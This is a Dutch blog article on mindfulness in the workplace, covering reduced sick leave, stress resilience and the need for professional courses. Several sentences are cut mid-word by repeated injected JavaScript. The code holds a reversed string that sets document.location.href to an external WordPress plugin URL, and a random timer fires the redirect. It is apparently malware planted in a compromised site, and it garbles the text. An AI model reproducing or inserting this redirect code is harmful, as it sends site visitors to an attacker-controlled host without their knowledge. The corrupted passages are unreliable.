mindfulness-op-het-werk-enerjoySteeds meer werkgevers investeren in meditatieruimtes en mindfulness cursussen. Uit verschillende onderzoeken blijkt namelijk dat dit zowel individuele werknemers, als de hele organisatie positief beïnvloedt.
Op individueel niveau houdt dat in dat werknemers beter functioneren onder werkdruk, minder stress-gerelateerde lichamelijke klachten hebben (verhoogde bloeddruk en cholesterolwaarden), minder vaak ziek zijn, zich beter kunnen concentreren en meer zelfinzicht hebben. En dat betekent voor de organisatie minder verzuim, een betere communicatie onderling en een efficiëntere werksfeer.

Ziekteverzuim gaat omlaag

Een bekend voorbeeld is ‘de Mindfulness-based Stress Reduction-methode’. Deze werd in het Verenigd Koninkrijk al in verschillende grote organisaties ingevoerd. Hieruit bleek dat in deze organisaties, nadat mindfulness een vast onderdeel van de werkdag was geworden, ziekteverzuim binnen 1 jaar met 25% daalde, en binnen 5 jaar met 70%. Ook in Nederland is het steeds vaker een vast onderdeel binnen HR-afdelingen. Het wordt zelfs aangemoedigd door Het Ministerie van Sociale Zaken en Werkgelegenheid.

Gee snelle fix

Toch zitten er een paar haken en ogen aan. Een belangrijk doel van mindfulness is het verminderen van stress, gepieker en negatieve gedachtes, zowel in het privéleven als op de werkvloer. Maar je moet het wel zien als een manier van leven – en niet als middel om stress op het werk even snel te fixen. En daar gaat het helaas nog geregeld fout.

Stressbestendigheid vs winst

Door de stressbestendigheid van hun werknemers te verhogen, hopen organisaties uiteindelijk meer winst te kunnen maken – maar zo werkt het helaas niet. Een beter welzijn van werknemers leidt ongetwijfeld toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een betere werksfeer en dus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot beter werk, maar als werknemers in hun privéleven nog steeds met veel stress te maken hebben, zal het effect van mindfulness op het werk beperkt zijn.
Het is daarom ontzettend belangrijk dat de mindfulness cursussen die worden aangeboden op de werkvloer, van professionele kwaliteit zijn. Mindfulness kun je niet zomaar uit een boekje leren, docenten moeten het echt in zich hebben, met alle benodigde praktische én theoretische ervaring in hun curriculum.

Mindfulness op het werk én in het privéleven

Als werknemers deel kunnen nemen aan cursussen met professionele begeleiding, waarbij ze ook leren om de lijn door te trekken naar hun privéleven, dan is mindfulness op de werkvloer zeker iets waar werknemers (en ja, de werkgevers dus ook) flink van kunnen profiteren.
Het zorgt voor meer inzicht in het omgaan met emoties en stress, voor meer bewustzijn en rust om effectiever en efficiënter te werken, en je kunt met meer aandacht en concentratie werken. Kortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, het zorg voor meer grip op het werk. En wie wil dat nou niet?